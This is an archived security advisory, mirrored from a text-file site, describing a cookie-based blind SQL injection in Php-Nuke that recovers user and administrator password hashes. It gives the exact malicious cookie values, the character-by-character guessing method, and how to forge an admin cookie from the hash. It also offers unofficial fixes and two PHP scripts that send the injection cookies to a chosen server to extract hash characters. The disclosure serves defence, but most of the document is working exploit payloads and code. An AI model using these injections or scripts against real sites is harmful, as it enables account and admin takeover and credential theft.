Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: bt332.txt

Php-Nuke:users and admins password hashes vulnerability





BUGSMAN: serving security from Italy since..hem..well, about 1 year =0D=0A=
-------------------------------------------------------------------------=
------------ =0D=0AObject: users & admins password hash retrieving =0D=0A=
Tested on Php-Nuke 5.6 e 6.5 =0D=0AVulnerable versions: I've never seen a=
 patch for this so potentially all versions could be vulnerable... =0D=0A=
-------------------------------------------------------------------------=
------------ =0D=0ADescription: =0D=0AAn attacker can obtain password has=
hes for users and admins, using a particular SQL injection with cookies. =
=0D=0AAn incredible amount of sites are vulnerable to these attacks. =0D=0A=
Note: Since the SQL injection works with cookies, this problem is not pre=
vented by turning GPC_magic_quotes =0D=0Aon. =0D=0A><><><><><><><><><><><=
><><><><><><><><><><><><><><><><><><><><><>< =0D=0AUSER HASH: =0D=0ATo ge=
t the password hash of an user, the attacker just needs a valid account..=
. =0D=0AThe attacker visits www.victimsite.com/modules.php?name=3DYour_Ac=
count sending a spoofed user cookie crafted =0D=0Ain this way: =0D=0Auid =
should be: ' or (uname=3D'username_to_hack' and pass like 'a%') or uname =
=3D 'valid_username =0D=0Auname should be:  username_to_hack =0D=0Apass s=
hould be: valid_password =0D=0ANext stepis to examine the result page. If=
 the page is the login page (the one with textboxes) it means that =0D=0A=
the hash of the password to crack is really LIKE 'a%' and the attacker ca=
n go on with the next character. =0D=0AIf the page is the details page fo=
r the username_to_hack, then it's time to try LIKE 'B%'... =0D=0AIn max 5=
12 guesses the attacker has the hash of username_to_hack and now it is po=
ssible to create a spoofed =0D=0Acookie to be recognized as username_to_h=
ack. =0D=0A><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><=
><>< =0D=0AADMIN HASH: =0D=0ATo get the password hash of an admin, the at=
tacker only needs to know the name of that admin, and needs that =0D=0Ath=
e Web_Links module should be active and with at least one link: =0D=0ANOT=
E: The attacker doesn't need a valid account, and can exploit the bug eve=
n if the Web_Links module is =0D=0Aactive only for registered members... =
=0D=0AThe attacker visits www.victimsite.com/modules.php?name=3DWeb_Links=
&l_op=3Dviewlink&cid=3D2  =0D=0Asending a spoofed admin cookie crafted in=
 this way: =0D=0Aaid should be: admin_to_hack' and pwd like 'a% =0D=0Apwd=
 should be: anything you want =0D=0ANow the attacker examine the page: if=
 the links have the Edit links active, it means the password hash is =0D=0A=
really LIKE 'a%' so go on with next character, otherwise go on with LIKE =
'b%' =0D=0ANOTE: This trick works with some modification, with l_op=3DMos=
tPopular and l_op=3DNewLinksDate too. =0D=0AWith the hash the attacker ca=
n spoof a cookie and get into the admin section of the site. =0D=0AIMPORT=
ANT NOTE: it is not really a problem to obtain the name of an admin, sinc=
e the name of the God admin =0D=0Acan be obtained just using this exploit=
 with different injections. So what the attacker REALLY needs is the =0D=0A=
Web_Links module active and with at least one link!!!AND NOTHING MORE!!! =
=0D=0A><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< =
=0D=0AQUICK-AND-DIRTY FIX: =0D=0ASince I contacted Francisco Burzi, but I=
 didn't get any response I post a quick-and-dirty fix right out of =0D=0A=
my brain :) =0D=0ADISCLAIMER: I TAKE NO RESPONSABILITY FOR ANY KIND OF DA=
MAGE OR MISWORKING OF THE SITE CAUSED BY MY FIXES. =0D=0ATHESE ARE NOT OF=
FICIAL PHP-NUKE FIXES SO APPLY THEM AT YOUR OWN RISK! =0D=0AANOTHER NOTE:=
 I FIX MY PHP-NUKE THIS WAY AND IT WORKS, IT SHOULD WORK FOR YOU TOO.... =
=0D=0AFIXING USER EXPLOIT: =0D=0Ain file /mainfile.php, in function is_us=
er, before the line: =0D=0A   if ($uid !=3D '' AND $pwd !=3D '')  =0D=0Aa=
dd this line: =0D=0A$uid=3Daddslashes($uid); =0D=0A =0D=0AFIXING ADMIN EX=
PLOIT: =0D=0Ain file /modules/Web_Links/index.php, in functions NewLinksD=
ate, MostPopular and viewlink =0D=0Abefore the line: =0D=0A$admin=3Dexplo=
de(":",$admin); =0D=0Aadd this line: =0D=0A$admin=3Daddslashes($admin); =0D=
=0Athen change this line: =0D=0A$result3=3Dsql_query("select radminlink,r=
adminsuper from ".$prefix."_authors where aid =3D'$aid'", dbi); =0D=0Aand=
 make it look like this one: =0D=0A$result3=3Dsql_query("select radminlin=
k,radminsuper from ".$prefix."_authors where aid=3D'$aid' and =0D=0Apwd=3D=
'$admin[1]'", dbi); =0D=0ANOTE: YOU HAVE TO DO THIS FOR ALL THE 3 FUNCTIO=
NS LISTED BEFORE!!! =0D=0A><><><><><><><><><><><><><><><><><><><><><><><>=
<><><><><><><><><>< =0D=0AARE YOU WEAK? =0D=0AHere you can find two php p=
ages that you can use to find out if your site is vulnerable to this atta=
ck. Just =0D=0Aupload the pages on the webserver running php-nuke in the =
same directory for your config.php and open them. =0D=0ANOTE:THESE SCRIPT=
 ARE VERY POOR-CODED, AND I DO NOT ASSURE THAT THEIR =0D=0ARESPONSE IS RI=
GHT!  THEY WORKED FOR ME AND I HOPE THEY WORK FOR YOU TOO! SORRY FOR THE =
POOR CODING BUT THE =0D=0ASCRIPTS WERE MADE IN HALF AN HOUR :) =0D=0ANOTE=
: BEFORE YOU EXECUTE THE SCRIPT, BE SURE TO PERSONALIZE THE VALUES WHERE =
INDICATED!!! =0D=0AThis one is to check  the user vulnerability: =0D=0A><=
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< =0D=0A<?=
php =0D=0A//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, ye=
ah!!!! =0D=0A//This one checks for the user password hash retrieving vuln=
erability =0D=0A//Note: adjust the script execution time in your php.ini =
if the script =0D=0A//takes too long =0D=0A$server=3D"localhost"; =0D=0A$=
script=3D"/modules.php?name=3DYour_Account"; =0D=0A$validaccount=3D"accou=
nt";// <---Put a valid username here!!! =0D=0A$validpass=3D"password";   =
// <---Put the password for the above username here!!! =0D=0A$account_to_=
hack=3D"pippo";//<--- Put another valid username here!!! =0D=0A$md5char[0=
]=3D"0"; =0D=0A$md5char[1]=3D"1"; =0D=0A$md5char[2]=3D"2"; =0D=0A$md5char=
[3]=3D"3"; =0D=0A$md5char[4]=3D"4"; =0D=0A$md5char[5]=3D"5"; =0D=0A$md5ch=
ar[6]=3D"6"; =0D=0A$md5char[7]=3D"7"; =0D=0A$md5char[8]=3D"8"; =0D=0A$md5=
char[9]=3D"9"; =0D=0A$md5char[10]=3D"a"; =0D=0A$md5char[11]=3D"b"; =0D=0A=
$md5char[12]=3D"c"; =0D=0A$md5char[13]=3D"d"; =0D=0A$md5char[14]=3D"e"; =0D=
=0A$md5char[15]=3D"f"; =0D=0A$found=3D0; =0D=0A$md5reg=3D""; =0D=0A =0D=0A=
function sendToHost($host,$method,$path,$cook) =0D=0A{ =0D=0A	$buf=3D""; =
=0D=0A	$method =3D strtoupper($method); =0D=0A	$fp =3D fsockopen($host,80=
); =0D=0A	fputs($fp, "$method $path HTTP/1.1\n"); =0D=0A	fputs($fp, "Host=
: $host\n"); =0D=0A	fputs($fp, "Connection: close\n"); =0D=0A	fputs($fp, =
"Pragma: no-cache\n"); =0D=0A	fputs($fp, "Cache-control: no-cache\n"); =0D=
=0A	fputs($fp, "Cookie: user=3D$cook; lang=3Ditalian\n"); =0D=0A	fputs($f=
p, "\n\n"); =0D=0A	while (!feof($fp)) =0D=0A		$buf .=3D fgets($fp,128); =0D=
=0A	fclose($fp); =0D=0A	return $buf; =0D=0A} =0D=0Aif (!isset($charindex)=
) =0D=0A	$charindex=3D0; =0D=0A$found=3D0; =0D=0Awhile($charindex<16){ =0D=
=0A	$md5reg=3D"$md5char[$charindex]%"; =0D=0A	$uid=3D"' or (uname =3D '$a=
ccount_to_hack' and pass like '$md5reg') or uname =3D '$validaccount"; =0D=
=0A	$validpass=3Dmd5("$validpass"); =0D=0A	$cookie=3Dbase64_encode("$uid:=
$account_to_hack:$validpass"); =0D=0A	$cookie=3Dstr_replace("=3D","%3D",$=
cookie); =0D=0A	$data=3DsendToHost("$server","get","$script","$cookie"); =
=0D=0A	if (eregi("Password",$data)){ =0D=0A		$found +=3D 1; =0D=0A		$char=
index +=3D 1; =0D=0A	} =0D=0A	else{ $charindex +=3D 1; =0D=0A		Header("Lo=
cation: ".$PHP_SELF."?charindex=3D$charindex&charfound=3D$charfound&curmd=
5=3D$curmd5"); =0D=0A	} =0D=0A} =0D=0Aecho "Test-script for PHP-NUKE Vuln=
erabilities: Bugsman made it, yeah!!!!<br>"; =0D=0Aecho "This one check f=
or the user password hash retrieving vulnerability...<br>"; =0D=0Aif($fou=
nd=3D=3D16) =0D=0A	echo "You are NOT vulnerable<br>"; =0D=0Aelse =0D=0A	e=
cho "You are vulnerable!<br>Apply a fix ASAP<br>"; =0D=0Aecho "BUGSMAN: s=
erving security from Italy since...hem, well, about 1 year :)<br>"; =0D=0A=
?> =0D=0A><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><=
>< =0D=0AAnd this one is to check the admin vulnerability: =0D=0A><><><><=
><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< =0D=0A<?php =0D=
=0A//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! =
=0D=0A//This one checks for the admin password hash retrieving vulnerabil=
ity =0D=0A//Note: adjust the script execution time in your php.ini if the=
 script =0D=0A//takes too long =0D=0A$server=3D"localhost"; =0D=0A$script=
=3D"/modules.php?name=3DWeb_Links&l_op=3Dviewlink&cid=3D1";//<---put a ci=
d that shows a page with links in it =0D=0A$account_to_hack=3D"admin";//<=
--- Put the admin username here!!! =0D=0A$md5char[0]=3D"0"; =0D=0A$md5cha=
r[1]=3D"1"; =0D=0A$md5char[2]=3D"2"; =0D=0A$md5char[3]=3D"3"; =0D=0A$md5c=
har[4]=3D"4"; =0D=0A$md5char[5]=3D"5"; =0D=0A$md5char[6]=3D"6"; =0D=0A$md=
5char[7]=3D"7"; =0D=0A$md5char[8]=3D"8"; =0D=0A$md5char[9]=3D"9"; =0D=0A$=
md5char[10]=3D"a"; =0D=0A$md5char[11]=3D"b"; =0D=0A$md5char[12]=3D"c"; =0D=
=0A$md5char[13]=3D"d"; =0D=0A$md5char[14]=3D"e"; =0D=0A$md5char[15]=3D"f"=
; =0D=0A$found=3D0; =0D=0A$md5reg=3D""; =0D=0A =0D=0Afunction sendToHost(=
$host,$method,$path,$cook) =0D=0A{ =0D=0A	$buf=3D""; =0D=0A	$method =3D s=
trtoupper($method); =0D=0A	$fp =3D fsockopen($host,80); =0D=0A	fputs($fp,=
 "$method $path HTTP/1.1\n"); =0D=0A	fputs($fp, "Host: $host\n"); =0D=0A	=
fputs($fp, "Connection: close\n"); =0D=0A	fputs($fp, "Pragma: no-cache\n"=
); =0D=0A	fputs($fp, "Cache-control: no-cache\n"); =0D=0A	fputs($fp, "Coo=
kie: admin=3D$cook; lang=3Ditalian\n"); =0D=0A	fputs($fp, "\n\n"); =0D=0A=
	while (!feof($fp)) =0D=0A		$buf .=3D fgets($fp,128); =0D=0A	fclose($fp);=
 =0D=0A	return $buf; =0D=0A} =0D=0Aif (!isset($charindex)) =0D=0A	$charin=
dex=3D0; =0D=0A$found=3D0; =0D=0Awhile(($charindex<16)&&($found=3D=3D0)){=
 =0D=0A	$md5reg=3D"$md5char[$charindex]%"; =0D=0A	$aid=3D"$account_to_hac=
k' and pwd like '$md5reg"; =0D=0A	$validpass=3Dmd5("useless_pass"); =0D=0A=
	$cookie=3Dbase64_encode("$aid:$validpass"); =0D=0A	$cookie=3Dstr_replace=
("=3D","%3D",$cookie); =0D=0A	$data=3DsendToHost("$server","get","$script=
","$cookie"); =0D=0A	if (eregi("Edit",$data)){ =0D=0A		$found +=3D 1; =0D=
=0A		$charindex +=3D 1; =0D=0A	} =0D=0A	else{ $charindex +=3D 1; =0D=0A//=
		echo "$data"; =0D=0A		Header("Location: ".$PHP_SELF."?charindex=3D$char=
index"); =0D=0A	} =0D=0A} =0D=0Aecho "Test-script for PHP-NUKE Vulnerabil=
ities: Bugsman made it, yeah!!!!<br>"; =0D=0Aecho "This one check for the=
 admin password hash retrieving vulnerability...<br>"; =0D=0Aif($found=3D=
=3D0) =0D=0A	echo "You are NOT vulnerable<br>"; =0D=0Aelse =0D=0A	echo "Y=
ou are vulnerable!<br>Apply a fix ASAP<br>"; =0D=0Aecho "BUGSMAN: serving=
 security from Italy since...hem, well, about 1 year :)<br>"; =0D=0A?> =0D=
=0A><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< =0D=
=0A =0D=0AFor any suggestion, comments, hiring (I need money too) or any =
other thing, contact me at: =0D=0Abugsman@libero.it =0D=0A =0D=0ASee ya!!=
!! =0D=0A =0D=0A =0D=0A =0D=0A =0D=0A 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH